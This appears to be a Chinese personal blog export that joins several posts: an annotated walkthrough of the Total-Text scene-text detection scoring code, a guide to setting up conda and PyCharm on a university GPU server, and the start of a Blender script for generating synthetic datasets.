            input_id != 'Pascal_result_curved.txt') and (input_id != 'Pascal_result_non_curved.txt') and (input_id != 'Deteval_result.txt') and (input_id != 'Deteval_result_curved.txt') \
            and (input_id != 'Deteval_result_non_curved.txt'):
        # print(input_id)
        detections = input_reading_mod(input_dir, input_id)
        groundtruths = gt_reading_mod(gt_dir, input_id)
        detections = detection_filtering(detections, groundtruths)  # filters detections overlapping with DC area
        dc_id = np.where(groundtruths[:, 5] == '#')
        groundtruths = np.delete(groundtruths, (dc_id), (0))

        local_sigma_table = np.zeros((groundtruths.shape[0], len(detections)))
        local_tau_table = np.zeros((groundtruths.shape[0], len(detections)))

        for gt_id, gt in enumerate(groundtruths):
            if len(detections) > 0:
                for det_id, detection in enumerate(detections):
                    detection = detection.split(',')
                    detection = list(map(int, detection))
                    det_y = detection[0::2]
                    det_x = detection[1::2]
                    gt_x = list(map(int, np.squeeze(gt[1])))
                    gt_y = list(map(int, np.squeeze(gt[3])))

                    local_sigma_table[gt_id, det_id] = sigma_calculation(det_x, det_y, gt_x, gt_y)
                    local_tau_table[gt_id, det_id] = tau_calculation(det_x, det_y, gt_x, gt_y)

        global_sigma.append(local_sigma_table)
        global_tau.append(local_tau_table)

global_accumulative_recall = 0
global_accumulative_precision = 0
total_num_gt = 0
total_num_det = 0

This code loops over every input_id in the list allInputs.

Inside the loop, a series of conditions first skips special files such as .DS_Store and Pascal_result.txt. It then calls input_reading_mod to read the detections from input_dir, and gt_reading_mod to read the annotations from gt_dir.

Next, detection_filtering removes detections that overlap the don't-care (DC) regions. The indices of the DC regions in the annotations are then found, and np.delete removes those rows from the annotations.

Two zero matrices, local_sigma_table and local_tau_table, of shape (groundtruths.shape[0], len(detections)), are created to store the overlap between each annotation and each detection.

The two nested for loops then compute those overlaps: the coordinates of each detection and annotation are parsed, sigma_calculation and tau_calculation are called, and the results are stored in local_sigma_table and local_tau_table.

Finally, local_sigma_table and local_tau_table are appended to global_sigma and global_tau, accumulating the overlap information for every image.

The last few lines define the variables global_accumulative_recall, global_accumulative_precision, total_num_gt and total_num_det, all initialized to 0, for use by the matching code below.

• one_to_one()

def one_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
               local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
               gt_flag, det_flag):
    for gt_id in range(num_gt):
        gt_matching_qualified_sigma_candidates = np.where(local_sigma_table[gt_id, :] > tr)
        gt_matching_num_qualified_sigma_candidates = gt_matching_qualified_sigma_candidates[0].shape[0]
        gt_matching_qualified_tau_candidates = np.where(local_tau_table[gt_id, :] > tp)
        gt_matching_num_qualified_tau_candidates = gt_matching_qualified_tau_candidates[0].shape[0]

        det_matching_qualified_sigma_candidates = np.where(local_sigma_table[:, gt_matching_qualified_sigma_candidates[0]] > tr)
        det_matching_num_qualified_sigma_candidates = det_matching_qualified_sigma_candidates[0].shape[0]
        det_matching_qualified_tau_candidates = np.where(local_tau_table[:, gt_matching_qualified_tau_candidates[0]] > tp)
        det_matching_num_qualified_tau_candidates = det_matching_qualified_tau_candidates[0].shape[0]

        if (gt_matching_num_qualified_sigma_candidates == 1) and (gt_matching_num_qualified_tau_candidates == 1) and \
           (det_matching_num_qualified_sigma_candidates == 1) and (det_matching_num_qualified_tau_candidates == 1):
            global_accumulative_recall = global_accumulative_recall + 1.0
            global_accumulative_precision = global_accumulative_precision + 1.0
            local_accumulative_recall = local_accumulative_recall + 1.0
            local_accumulative_precision = local_accumulative_precision + 1.0

            gt_flag[0, gt_id] = 1
            matched_det_id = np.where(local_sigma_table[gt_id, :] > tr)
            det_flag[0, matched_det_id] = 1
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

This code defines a function named one_to_one, which takes local_sigma_table, local_tau_table, local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag and det_flag.

Its for loop iterates gt_id from 0 to num_gt, where num_gt is the number of annotations.

Inside the loop, np.where first finds the indices where local_sigma_table[gt_id, :] > tr and where local_tau_table[gt_id, :] > tp; the candidate counts are stored in gt_matching_num_qualified_sigma_candidates and gt_matching_num_qualified_tau_candidates.

np.where is then applied again, restricted to those candidate columns, to count the qualifying entries from the detection side, giving det_matching_num_qualified_sigma_candidates and det_matching_num_qualified_tau_candidates.

A series of conditions then checks the one-to-one criterion: exactly one annotation and exactly one detection satisfy both overlap thresholds. If so, the recall and precision accumulators are incremented by 1.0 and the corresponding flags are set to 1.

Finally, the function returns the updated local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag and det_flag.

• one_to_many()

def one_to_many(local_sigma_table, local_tau_table, local_accumulative_recall,
                local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
                gt_flag, det_flag):
    for gt_id in range(num_gt):
        # skip the following if the groundtruth was matched
        if gt_flag[0, gt_id] > 0:
            continue

        non_zero_in_sigma = np.where(local_sigma_table[gt_id, :] > 0)
        num_non_zero_in_sigma = non_zero_in_sigma[0].shape[0]

        if num_non_zero_in_sigma >= k:
            #### search for all detections that overlap with this groundtruth
            qualified_tau_candidates = np.where((local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0))
            num_qualified_tau_candidates = qualified_tau_candidates[0].shape[0]

            if num_qualified_tau_candidates == 1:
                if ((local_tau_table[gt_id, qualified_tau_candidates] >= tp) and (local_sigma_table[gt_id, qualified_tau_candidates] >= tr)):
                    # became a one-to-one case
                    global_accumulative_recall = global_accumulative_recall + 1.0
                    global_accumulative_precision = global_accumulative_precision + 1.0
                    local_accumulative_recall = local_accumulative_recall + 1.0
                    local_accumulative_precision = local_accumulative_precision + 1.0

                    gt_flag[0, gt_id] = 1
                    det_flag[0, qualified_tau_candidates] = 1
            elif (np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr):
                gt_flag[0, gt_id] = 1
                det_flag[0, qualified_tau_candidates] = 1

                global_accumulative_recall = global_accumulative_recall + fsc_k
                global_accumulative_precision = global_accumulative_precision + num_qualified_tau_candidates * fsc_k

                local_accumulative_recall = local_accumulative_recall + fsc_k
                local_accumulative_precision = local_accumulative_precision + num_qualified_tau_candidates * fsc_k

    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

This code defines a function named one_to_many, similar to the earlier one_to_one and taking the same parameters.

Its for loop iterates gt_id from 0 to num_gt, where num_gt is the number of annotations.

Inside the loop, it first skips annotations that are already matched: if gt_flag[0, gt_id] is greater than 0, the iteration continues.

Next, np.where finds the indices where local_sigma_table[gt_id, :] > 0, and the count is stored in num_non_zero_in_sigma.

If num_non_zero_in_sigma >= k, the function proceeds.

np.where then finds the indices satisfying (local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0), and the count is stored in num_qualified_tau_candidates.

If num_qualified_tau_candidates equals 1, the annotation and its single candidate detection are checked against the one-to-one criterion, i.e. both overlap thresholds must hold; if they do, the accumulators are incremented by 1.0 and the flags are set to 1.

If num_qualified_tau_candidates is greater than 1 and np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr, the accumulators are updated with the fsc_k penalty and the flags are set to 1 (see the condition spelled out below).

Finally, the function returns the updated local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag and det_flag.
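In symbols, for a still-unmatched ground truth $G_i$ the candidate set is

$$
S_i = \{\, j \mid \tau_{ij} \ge tp,\ D_j \text{ unmatched} \,\},
$$

and the split is accepted when $\sum_{j \in S_i} \sigma_{ij} \ge tr$, contributing $0.8$ to recall and $0.8\,|S_i|$ to precision; many_to_one below applies the mirrored condition with the roles of $\sigma$ and $\tau$ swapped.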

• many_to_one()

def many_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
                local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
                gt_flag, det_flag):
    for det_id in range(num_det):
        # skip the following if the detection was matched
        if det_flag[0, det_id] > 0:
            continue

        non_zero_in_tau = np.where(local_tau_table[:, det_id] > 0)
        num_non_zero_in_tau = non_zero_in_tau[0].shape[0]

        if num_non_zero_in_tau >= k:
            #### search for all groundtruths that overlap with this detection
            qualified_sigma_candidates = np.where((local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0))
            num_qualified_sigma_candidates = qualified_sigma_candidates[0].shape[0]

            if num_qualified_sigma_candidates == 1:
                if ((local_tau_table[qualified_sigma_candidates, det_id] >= tp) and (local_sigma_table[qualified_sigma_candidates, det_id] >= tr)):
                    # became a one-to-one case
                    global_accumulative_recall = global_accumulative_recall + 1.0
                    global_accumulative_precision = global_accumulative_precision + 1.0
                    local_accumulative_recall = local_accumulative_recall + 1.0
                    local_accumulative_precision = local_accumulative_precision + 1.0

                    gt_flag[0, qualified_sigma_candidates] = 1
                    det_flag[0, det_id] = 1
            elif (np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp):
                det_flag[0, det_id] = 1
                gt_flag[0, qualified_sigma_candidates] = 1

                global_accumulative_recall = global_accumulative_recall + num_qualified_sigma_candidates * fsc_k
                global_accumulative_precision = global_accumulative_precision + fsc_k

                local_accumulative_recall = local_accumulative_recall + num_qualified_sigma_candidates * fsc_k
                local_accumulative_precision = local_accumulative_precision + fsc_k
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

This code defines a function named many_to_one, analogous to the earlier one_to_one and one_to_many and taking the same parameters.

Its for loop iterates det_id from 0 to num_det, where num_det is the number of detections.

Inside the loop, it first skips detections that are already matched: if det_flag[0, det_id] is greater than 0, the iteration continues.

Next, np.where finds the indices where local_tau_table[:, det_id] > 0, and the count is stored in num_non_zero_in_tau.

If num_non_zero_in_tau >= k, the function proceeds.

np.where then finds the indices satisfying (local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0), and the count is stored in num_qualified_sigma_candidates.

If num_qualified_sigma_candidates equals 1, the detection and its single candidate annotation are checked against the one-to-one criterion, i.e. both overlap thresholds must hold; if they do, the accumulators are incremented by 1.0 and the flags are set to 1.

If num_qualified_sigma_candidates is greater than 1 and np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp, the accumulators are updated with the fsc_k penalty (num_qualified_sigma_candidates * fsc_k for recall, fsc_k for precision) and the flags are set to 1.

Finally, the function returns the updated local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag and det_flag.

• Saving the results

for idx in range(len(global_sigma)):
    print(allInputs[idx])
    local_sigma_table = global_sigma[idx]
    local_tau_table = global_tau[idx]

    num_gt = local_sigma_table.shape[0]
    num_det = local_sigma_table.shape[1]

    total_num_gt = total_num_gt + num_gt
    total_num_det = total_num_det + num_det

    local_accumulative_recall = 0
    local_accumulative_precision = 0
    gt_flag = np.zeros((1, num_gt))
    det_flag = np.zeros((1, num_det))

    #######first check for one-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = one_to_one(local_sigma_table, local_tau_table,
                                   local_accumulative_recall, local_accumulative_precision,
                                   global_accumulative_recall, global_accumulative_precision,
                                   gt_flag, det_flag)

    #######then check for one-to-many case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = one_to_many(local_sigma_table, local_tau_table,
                                    local_accumulative_recall, local_accumulative_precision,
                                    global_accumulative_recall, global_accumulative_precision,
                                    gt_flag, det_flag)

    #######then check for many-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = many_to_one(local_sigma_table, local_tau_table,
                                    local_accumulative_recall, local_accumulative_precision,
                                    global_accumulative_recall, global_accumulative_precision,
                                    gt_flag, det_flag)

    fid = open(fid_path, 'a+')
    try:
        local_precision = local_accumulative_precision / num_det
    except ZeroDivisionError:
        local_precision = 0

    try:
        local_recall = local_accumulative_recall / num_gt
    except ZeroDivisionError:
        local_recall = 0

    temp = ('%s______/Precision:_%s_______/Recall:_%s\n' % (allInputs[idx], str(local_precision), str(local_recall)))
    fid.write(temp)
    fid.close()

try:
    recall = global_accumulative_recall / total_num_gt
except ZeroDivisionError:
    recall = 0

try:
    precision = global_accumulative_precision / total_num_det
except ZeroDivisionError:
    precision = 0

try:
    f_score = 2 * precision * recall / (precision + recall)
except ZeroDivisionError:
    f_score = 0

fid = open(fid_path, 'a')
temp = ('Precision:_%s_______/Recall:_%s\n' % (str(precision), str(recall)))
fid.write(temp)
fid.close()
print(temp)

This code is a loop over every element of the global_sigma list.

In each iteration, it first prints allInputs[idx], then assigns global_sigma[idx] to local_sigma_table and global_tau[idx] to local_tau_table.

Next, the shape of local_sigma_table gives num_gt and num_det.

num_gt and num_det are then added to the accumulators total_num_gt and total_num_det.

Then local_accumulative_recall, local_accumulative_precision, gt_flag and det_flag are initialized.

one_to_one, one_to_many and many_to_one are called in turn on local_sigma_table and local_tau_table, updating the accumulators and flag arrays.

Finally, the per-image precision and recall (local_accumulative_precision / num_det and local_accumulative_recall / num_gt) are written to the output file; after the loop, the global precision, recall and F-score are computed and written as well.
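The final numbers written at the end correspond to

$$
\text{precision} = \frac{\text{global\_accumulative\_precision}}{\text{total\_num\_det}}, \qquad
\text{recall} = \frac{\text{global\_accumulative\_recall}}{\text{total\_num\_gt}}, \qquad
F = \frac{2 \cdot \text{precision} \cdot \text{recall}}{\text{precision} + \text{recall}},
$$

with each division falling back to $0$ on ZeroDivisionError.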

Pascal VOC

​ The conventional $0.5$ (IoU) threshold.


​ Two implementations are provided, Matlab and Python, but only the Matlab one comes with an example... the Python one has none. Unbelievable.

    png

Groundtruth

​ Available ground truth formats:

• Pixel level

  • Character Level Mask

    • The pixel level groundtruth of Total-Text dataset can be downloaded at this https URL (80Mb).

    gif

  • Text Region Mask

    • The text region mask groundtruth of Total-Text dataset can be downloaded at this https URL (6Mb).

    gif

• Text level

  png

Plan (doomed)

​ The goal is to reproduce the code from Total-Text Benchmark (Scene Text Detection) | Papers With Code and cs-chan/Total-Text-Dataset: Total Text Dataset. It consists of 1555 images with more than 3 different text orientations: Horizontal, Multi-Oriented, and Curved, one of a kind. (github.com).

​ These are damn hard to reproduce.

​ Tried / planning to try:

| Model | F-Measure | Precision | Recall | Paper | GitHub | Notes |
| --- | --- | --- | --- | --- | --- | --- |
| CentripetalText | 87.85% | 90.67 | 85.19 | CentripetalText: An Efficient Text Instance Representation for Scene Text Detection (Papers With Code) | shengtao96/CentripetalText (github.com) | Default Total-Text format |
| FCE | 89.3 | 82.5 | 85.8 | GXYM/TextBPN-Plus-Plus: Arbitrary Shape Text Detection via Boundary Transformer; paper at https://arxiv.org/abs/2205.05320, accepted by IEEE Transactions on Multimedia (T-MM 2023) (github.com) | GXYM/TextBPN-Plus-Plus (github.com) | Default Total-Text format |
| DPText-DETR (ResNet-50) | 87.3% | 82.1 | 93.1 | [2211.10772] DeepSolo: Let Transformer Decoder with Explicit Points Solo for Text Spotting (arxiv.org) | ViTAE-Transformer/DeepSolo: The official repo for [CVPR'23] "DeepSolo" & [ArXiv'23] "DeepSolo++" (github.com) | Total-Text format differs from the default (complex json files) |
| FAST-B-800 | 87.5% | 90.0 | 85.2 | [2111.02394v2] FAST: Faster Arbitrarily-Shaped Text Detector with Minimalist Kernel Representation (arxiv.org) | czczup/FAST (github.com) | sh ./compile.sh fails to build. Dead! |
| TextFuseNet (ResNeXt-101) | 87.5% | 89.2 | 85.8 | TextFuseNet: Scene Text Detection with Richer Fused Features (Papers With Code) | ying09/TextFuseNet (github.com) | |
| I3CL + SSL (ResNet-50) | 86.9% | 89.8 | 84.2 | I3CL: Intra- and Inter-Instance Collaborative Learning for Arbitrary-shaped Scene Text Detection (IJCV'22) | ViTAE-Transformer/I3CL (github.com) | Repo doesn't seem to support Total-Text |
| CharNet H-88 (multi-scale) | 86.5% | 88 | 85 | Convolutional Character Networks (Papers With Code) | msight-tech/research-charnet: CharNet: Convolutional Character Networks (github.com) | Repo doesn't seem to support Total-Text, only ICDAR2015 |
| DBNet++ (ResNet-50) | 86% | 88.9 | 83.2 | Real-Time Scene Text Detection with Differentiable Binarization and Adaptive Scale Fusion (Papers With Code) | MhLiao/DB (github.com) | Total-Text format differs from the default (fairly readable txt format) |
| PAN-640 | 85% | 89.3 | 81 | Efficient and Accurate Arbitrary-Shaped Text Detection with Pixel Aggregation Network (Papers With Code) | WenmuZhou/PAN.pytorch, an unofficial PyTorch implementation of PAN (PSENet2) (github.com) | Repo doesn't seem to support Total-Text, only ICDAR2015 |
| DB-ResNet-50 (800) | 84.7% | | | Real-time Scene Text Detection with Differentiable Binarization (Papers With Code) | MhLiao/DB (github.com) | Total-Text format differs from the default (fairly readable txt format) |
| CRAFT | 83.6% | 87.6 | 79.9 | Character Region Awareness for Text Detection (Papers With Code) | clovaai/CRAFT-pytorch (github.com) | Repo doesn't seem to support Total-Text |
| TextSnake | 78.4% | 82.7 | 74.5 | TextSnake: A Flexible Representation for Detecting Text of Arbitrary Shapes (Papers With Code) | princewang1994/TextSnake.pytorch (github.com) | Total-Text format differs from the default |

Visualizing the dataset

​ Based on the dataset's source images and its txt annotation format, plus a round of ChatGPT and some fiddling, here is a visualization script:

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 396

image_dir = r'E:\dataset\TotalText\Images\Test\\'
label_dir = r'E:\dataset\TotalText\GroundTruth\Text\Test\\'

image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape
label_file = open(label_path, 'r')
annotations = label_file.readlines()
label_file.close()

for annotation in annotations:
    x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
    y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
    ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]
    transcriptions = annotation[annotation.find("transcriptions: [u'") + 19: -3]

    points = np.array([x, y], np.int32).T

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, ornt, (x[0], y[0] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))
    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()
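​ For reference, each line of a poly_gt_imgXXX.txt file looks roughly like the following, matching the substrings the script searches for (the values here are made up for illustration):

x: [[115 503 494 115]], y: [[322 346 426 404]], ornt: [u'h'], transcriptions: [u'EXAMPLE']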

    png

/posts/Server-%E5%AD%A6%E6%A0%A1%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9B%B8%E5%85%B3/

Main text

Preparation

png

​ Download MobaXterm: https://en.softonic.com/download/moba/windows/post-download

Login

​ In MobaXterm, click Session to open Session settings. Enter 10.188.65.154 under Remote host and your username under Specify username; Port stays at 22.

​ Remote environment defaults to Interactive shell; choosing Gnome desktop opens Ubuntu's graphical desktop instead.

png

png

​ Log in to the server:

    png

Common commands

who

​ See who is online right now:

    who
    伟哥   pts/0        2023-06-24 09:53 (10.62.62.XXX)
    伟哥 pts/1 2023-06-24 09:59 (10.62.62.XXX)
    伟哥 pts/2 2023-06-25 08:26 (10.62.62.XXX)
    guanz pts/3 2023-06-25 19:43 (10.91.140.XXX)
    伟哥 pts/4 2023-06-23 08:17 (10.62.62.XXX)
    伟哥 pts/5 2023-06-23 15:48 (10.62.62.XXX)
    伟哥 pts/6 2023-06-23 15:36 (10.61.20.XXX)
    伟哥 pts/8 2023-06-23 15:56 (10.61.20.XXX)

nvidia-smi

​ Check the GPU status:

    nvidia-smi
    Sun Jun 25 20:11:14 2023
    +-----------------------------------------------------------------------------+
    | NVIDIA-SMI 510.85.02 Driver Version: 510.85.02 CUDA Version: 11.6 |
    |-------------------------------+----------------------+----------------------+
    | GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
    | Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
    | | | MIG M. |
    |===============================+======================+======================|
    | 0 NVIDIA GeForce ... Off | 00000000:65:00.0 Off | N/A |
    | 30% 58C P2 104W / 320W | 9514MiB / 10240MiB | 19% Default |
    | | | N/A |
    +-------------------------------+----------------------+----------------------+

    +-----------------------------------------------------------------------------+
    | Processes: |
    | GPU GI CI PID Type Process name GPU Memory |
    | ID ID Usage |
    |=============================================================================|
    | 0 N/A N/A 1348 G /usr/lib/xorg/Xorg 9MiB |
    | 0 N/A N/A 1614 G /usr/bin/gnome-shell 6MiB |
    | 0 N/A N/A 3562342 C python 5767MiB |
    | 0 N/A N/A 3567780 C python 3727MiB |
    +-----------------------------------------------------------------------------+

ps

​ PID 3562342 is busy; check which user is running it:

    ps -f -p 3562342
    UID          PID    PPID  C STIME TTY          TIME CMD
    伟哥 3562342 3542160 99 09:33 ? 10:42:43 python occupyGPU_5G.py

Getting the server online

firefox

​ To log in to the campus network, open Firefox:

firefox

​ Enter 202.206.1.231 in the address bar and log in to the campus network; the server is then online.

png

ping

​ Check whether the server can reach the campus network:

    ping www.baidu.com
    PING www.a.shifen.com (220.181.38.150) 56(84) bytes of data.
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=1 ttl=51 时间=9.12 毫秒
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=2 ttl=51 时间=9.05 毫秒
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=3 ttl=51 时间=9.02 毫秒
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=4 ttl=51 时间=9.03 毫秒

Installing Anaconda on the server

​ Download the conda version you want from Index of /anaconda/archive/ | Tsinghua Open Source Mirror, here Anaconda3-2023.03-Linux-x86_64.sh, and copy it to the server:

png

​ Remove the old Anaconda:

    rm -rf ~/anaconda3

​ Delete the other leftover files:

    rm -rf ~/.condarc ~/.conda

​ Install it:

    chmod u+x Anaconda3-2023.03-Linux-x86_64.sh
    bash ./Anaconda3-2023.03-Linux-x86_64.sh

​ Fix the conda-related part of .bashrc:

export PATH=$PATH:/usr/bin/:$PATH
# >>> conda initialize >>>
# !! Contents within this block are managed by 'conda init' !!
__conda_setup="$('/home/guanz/anaconda3/bin/conda' 'shell.bash' 'hook' 2> /dev/null)"
if [ $? -eq 0 ]; then
    eval "$__conda_setup"
else
    if [ -f "/home/guanz/anaconda3/etc/profile.d/conda.sh" ]; then
        . "/home/guanz/anaconda3/etc/profile.d/conda.sh"  # commented out by conda initialize
    else
        export PATH="/home/zhij/anaconda3/bin:$PATH"  # commented out by conda initialize
    fi
fi
unset __conda_setup

​ Set up mirrors in ~/.condarc (the Tsinghua mirror seemed to be down the day this was written, so switch to Aliyun):

    ssl_verify: False
    channels:
    - https://mirrors.aliyun.com/anaconda/pkgs/free/
    - https://mirrors.aliyun.com/anaconda/pkgs/main/
    show_channel_urls: True

Creating conda environments on the server

conda create

​ Only create virtual environments after the mirrors are configured, otherwise things are likely to break.

    conda create -n blender python=3.9

    conda info --envs

​ List the environments:

    conda info --envs
    # conda environments:
    #
    base * /home/guanz/anaconda3
    SRNet /home/guanz/anaconda3/envs/SRNet
    blender /home/guanz/anaconda3/envs/blender

    conda remove

​ Remove an environment:

    conda remove -n XXX --all

    pip install

    pip install pillow -i https://pypi.tuna.tsinghua.edu.cn/simple

​ If the Tsinghua mirror is down, try the Aliyun mirror:

    pip install pillow -i https://mirrors.aliyun.com/pypi/simple/

Migrating a local environment to the server

​ If installing an environment directly on the school server is too much hassle, you can first build it in the Ubuntu subsystem under Win11 and then migrate it to the server. Take a PyTorch environment as an example.


​ First build an environment with PyTorch 1.13.1 and CUDA 11.6 on the local machine (the school server runs CUDA 11.6).

​ Download torch-1.13.1+cu116-cp39-cp39-linux_x86_64.whl and torchvision-0.14.1+cu116-cp39-cp39-linux_x86_64.whl from download.pytorch.org/whl/torch_stable.html:

    conda create -n pytorch python=3.9
    conda activate pytorch
    pip install torch-1.13.1+cu116-cp39-cp39-linux_x86_64.whl -i https://mirrors.aliyun.com/pypi/simple/
    pip install torchvision-0.14.1+cu116-cp39-cp39-linux_x86_64.whl -i https://mirrors.aliyun.com/pypi/simple/

    conda pack

​ Pack the virtual environment pytorch into pytorch.tar.gz in the current directory:

conda pack -n pytorch -o pytorch.tar.gz

​ Copy the generated pytorch.tar.gz to the server.

​ In the home directory on the server:

    cd ./anaconda3/envs
    mkdir -p pytorch

​ Extract the contents of pytorch.tar.gz into ./anaconda3/envs/pytorch/:

    tar -xzf ../../pytorch.tar.gz -C pytorch

​ Check whether the migration is complete:

    conda env list
    base                  *  /home/guanz/anaconda3
    pytorch /home/guanz/anaconda3/envs/pytorch

​ Check that the environment actually works:

    python
    Python 3.9.16 (main, May 15 2023, 23:46:34)
    [GCC 11.2.0] :: Anaconda, Inc. on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import torch
    >>> import torchvision
    >>> torch.cuda.is_available()
    True

Connecting PyCharm to the server

​ Create a new project testGpu containing one .py file, testGpu.py:

    import torch

    flag = torch.cuda.is_available()
    print(flag)
    ngpu = 1
    # Decide which device we want to run on
    device = torch.device("cuda:0" if (torch.cuda.is_available() and ngpu > 0) else "cpu")
    print(device)
    print(torch.cuda.get_device_name(0))
    print(torch.rand(3,3).cuda())

Run it!

​ In PyCharm Professional, set the interpreter via On SSH...:

    png

​ Fill in the corresponding parameters:

• Host: 10.188.65.154
• Port: 22
• Username: guanz

    png

​ Enter the password:

    png

​ Choose the interpreter: /home/guanz/anaconda3/envs/pytorch/bin/python

    png

​ Run it! It does run, but all the GPU memory has been grabbed by 伟哥, orz:

    True
    cuda:0
    NVIDIA GeForce RTX 3080
    Traceback (most recent call last):
    File "/tmp/pycharm_project_2/testGpu.py", line 10, in <module>
    print(torch.rand(3,3).cuda())
    RuntimeError: CUDA error: out of memory
    CUDA kernel errors might be asynchronously reported at some other API call,so the stacktrace below might be incorrect.
    For debugging consider passing CUDA_LAUNCH_BLOCKING=1.

    Process finished with exit code 1

Code synchronization

Deployment → Configuration:

    png

​ Set up Connection:

    png

​ Set up Mappings:

• Local path: the local directory
• Deployment path: the server directory

    png

​ Once configured, you can Upload, Download, and so on:

    png

In Options, if Upload changed files automatically to the default server is set to On explicit save action (Ctrl+S), the code is uploaded on every save:

    png

    Winscp

    png

​ WinSCP makes it easy to transfer files between the local machine and the server.

What if I go home but still want to use the HBU server?

HBU VPN

​ You would need the Hebei University campus network VPN system (hbu.cn), but nobody seems to know the password. Dead!

​ Better just ask someone to power the machine on... thanks, 伟哥!

/posts/Blender-Datasets-auto-generator-based-on-Blender/

Resources

Code

    Config

import bpy
import math, mathutils
import os, random
import json
import numpy as np

mode = 'train'  # FLAGS : train or val
worldPath = 'pathToYourBackgrounds/'
objsPath = 'pathToYour3DObjso/'
imgPath = f'/home/xxx/Documents/myDataset/images/{mode}/'
labelPath = f'/home/xxx/Documents/myDataset/labels/{mode}/'
kittiCalibsPath = '/home/xxx/Documents/myDataset/kittiCalibs/'
kittiLabelsPath = '/home/xxx/Documents/myDataset/kittiLabels/'

picsNum = 2000
# Number of objects in a scene
objsNum = 4
if objsNum > len(os.listdir(objsPath)):
    objsNum = len(os.listdir(objsPath))
cameraLens = 15  # camera focal length
img_w = 960
img_h = 540
# Worlds changing frequency
freq_CTW = 10
objNameList = []

    main()

1. clearAll(): remove every object from the scene.
2. loadWorlds(): load the different world environments.
3. loadObjs(): load the objects to be rendered.
4. loadCamera(): load the camera.
5. scene.camera = scene.objects['Camera']: set the scene camera to the loaded camera.
6. scene.render.resolution_x and scene.render.resolution_y: set the output image width and height.
7. K = calibCamera(): compute the camera's internal parameters, i.e. the intrinsic matrix.
8. changeTheWorld(): change the world environment (e.g. the lighting) so that the images don't all look the same.
9. for i in range(picsNum): loop to output multiple images.
10. changeObjs(): change which objects are in the scene and their poses, so each image differs.
11. bougeLe(): move the objects randomly by some distance (simulating motion in a real scene).
12. snapIt(scene, i): take a shot of the scene, producing one rendered image.
13. calId = f'{kittiCalibsPath}{i}.txt': build the file name for saving the intrinsic matrix.
14. with open(calId,'w',encoding='utf-8') as fc:: open a file for writing the intrinsic matrix.
15. for p in K: fc.writelines(p): write the intrinsic matrix.
16. clearAll(): remove every object from the scene.

Here labelIt(i) is the annotation step that is still to be implemented; it should label the generated rendered images (a hypothetical sketch follows the code below).

def main():
    clearAll()
    loadWorlds()
    loadObjs()
    loadCamera()
    scene = bpy.context.scene  # get the current scene
    scene.camera = scene.objects['Camera']  # set the scene camera to the loaded camera
    scene.render.resolution_x = img_w  # output image width
    scene.render.resolution_y = img_h  # output image height
    K = calibCamera()  # compute the camera intrinsics (intrinsic matrix)
    changeTheWorld()  # change the environment (e.g. lighting) so images differ
    for i in range(picsNum):  # render picsNum images
        if i % freq_CTW == 0:
            changeTheWorld()
        changeObjs()  # change which objects are present and their poses
        bougeLe()  # move the objects randomly (simulating real-world motion)
        snapIt(scene, i)  # render one image
        labelIt(i)  # <- TODO
